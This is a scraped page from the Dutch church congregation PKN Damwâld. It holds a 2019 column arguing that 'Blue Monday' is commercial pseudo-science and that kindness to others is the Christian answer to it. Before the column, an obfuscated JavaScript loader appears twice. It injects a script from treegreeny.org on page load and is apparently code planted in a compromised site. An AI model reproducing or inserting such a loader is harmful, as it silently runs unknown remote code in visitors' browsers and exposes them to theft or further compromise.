;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Het nieuwe jaar - PKN Damwâld

Het nieuwe jaar

Gepubliceerd op: dinsdag 8 januari 2019

21 januari is het weer zover: Blue Monday … vrij vertaald ‘depri-maandag’. Een Brit heeft met een wiskundige formule uitgerekend (!!!) dat dit de meest deprimerende dag van het jaar is.
We zijn inmiddels alweer aardig op weg in 2019 en het gewone heeft zich weer meester van ons gemaakt. Blue Monday – zo las ik ergens – schijnt een zeer bepalende datum te zijn voor niet alleen onze gemoedsgesteldheid, maar ook voor de instandhouding van onze voornemens voor het nieuwe jaar. Op die dag schijnen we ons er opeens bewust van te zijn hoeveel zwaarder de feestdagen ons hebben gemaakt. Maar ook hoeveel lichter we ervan geworden zijn: want ze hebben ons een fortuin gekost… Daarnaast staat die dag bekend om z’n grijze verschijningen, veelal met regen. Geen wonder dat juist dan de meeste goede voornemens een roemloos einde hebben. Wat heeft het allemaal voor zin, nietwaar?
Blue Monday werd oorspronkelijk in 2005 ontworpen om reisorganisaties te helpen analyseren wanneer mensen hun zomervakantie waarschijnlijk zullen boeken. Het is een wiskundige formule die factoren analyseert, zoals het weer, schuldniveaus, nabijheid van feestdagen en het besef dat we onze voornemens alweer dit jaar niet kunnen houden. De wetenschap achter ‘Blue Monday’ is  op zijn zachtst gezegd natuurlijk uiterst vaag te noemen en de oplossingen lijken onmiskenbaar commercieel gedreven te zijn. Maar de waarheid blijft; deze tijd van het jaar kan ons een vrij leeg gevoel geven en een gebrek aan motivatie.
De oplossing om het kenmerkende Blue Monday-gevoel te kunnen beteugelen ligt dan ook ergens anders. In de kerk, als christen, mogen we ons altijd realiseren dat het ‘medicijn’ ergens anders ligt. In plaats van alle verwoede voornemens aan allerlei ‘zelf-verbeteringen’ te werken hierbij dan ook de uitdaging om jezelf de vraag eens te stellen: Wat kan ik doen aan de wereld om mij heen … wat kan ik doen voor de ander? Waarom? Omdat we allemaal een verschil kunnen maken in iemand anders leven!
Zou het in de opmaat naar 2020 niet geweldig zijn dit in de praktijk te brengen door eens naar ‘buiten’ te kijken in plaats van naar ‘binnen’ en ‘vrijgevig’ te leven met eenvoudige uitingen van vriendelijkheid. Want wat maakt nu bijvoorbeeld vrolijker dan een glimlach op iemands gezicht te toveren. Probeer het maar eens. Het is Gods antwoord op Blue Monday!

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns